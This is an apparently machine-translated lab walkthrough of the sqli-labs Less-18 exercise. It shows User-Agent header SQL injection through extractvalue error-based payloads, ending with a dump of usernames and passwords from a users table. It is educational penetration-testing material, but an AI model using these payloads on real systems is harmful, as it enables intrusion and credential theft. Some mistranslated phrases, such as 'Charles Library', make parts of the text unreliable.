View source
$uagent = $_SERVER['HTTP_USER_AGENT'];
…………
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
…………
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_uagentquery($insert);
The source can be seen, for $ the uname and $ the passwd have been filtered, so here injection sites do not exist, but the following INSERT INTO statement inserted $ uagent, $ IP and $ the uname, were also interact with the database, and the source code can be seen, $ uagent not filtered, so you can try to be injected $ uagent
Bp capture data obtained using the following
POST /sqli-labs-master/Less-18/ HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/sqli-labs-master/Less-18/ Content-Type: application/x-www-form-urlencoded Content-Length: 38 Connection: close Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=ils5p93b6rohhin07b46h1s2hmp08gvq Upgrade-Insecure-Requests: 1 uname=admin&passwd=admin&submit=Submit
Packet User-Agent: the latter value is the source of the incoming $ uagent, so we can try to modify the value of $ uagent to find the injection point
User-Agent:'
An error
User-Agent: "(double quote)
Not being given
User-Agent:' #
(After the test, using #, - +, 23% could not commented later ')
- Agent-the User: ' ' (two single quotes)
Since annotation can not later point ', then add a point in' closed so
Then construct statement that uses extractvalue error inquiry
' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '
For ease of understanding, we are closed in the following manner
Check the version
' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1
Charles Library
' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1'='1
Look-up table
' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'),0x7e)) and '1'='1
Return results can not be more than one
Solution one: check all the tables
' and extractvalue(1,concat(0x7e,(select group_concat( table_name) from information_schema.tables where table_schema='security'),0x7e)) and '1'='1
Solution two: a beautiful woman limit table (using LIMIT)
' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e)) and '1'='1
Query field content
' and extractvalue(1,concat(0x7e,(select group_concat(id,username,password) from security.users ),0x7e)) and '1'='1
extractvalue queries and similar updataxml, can only echo 32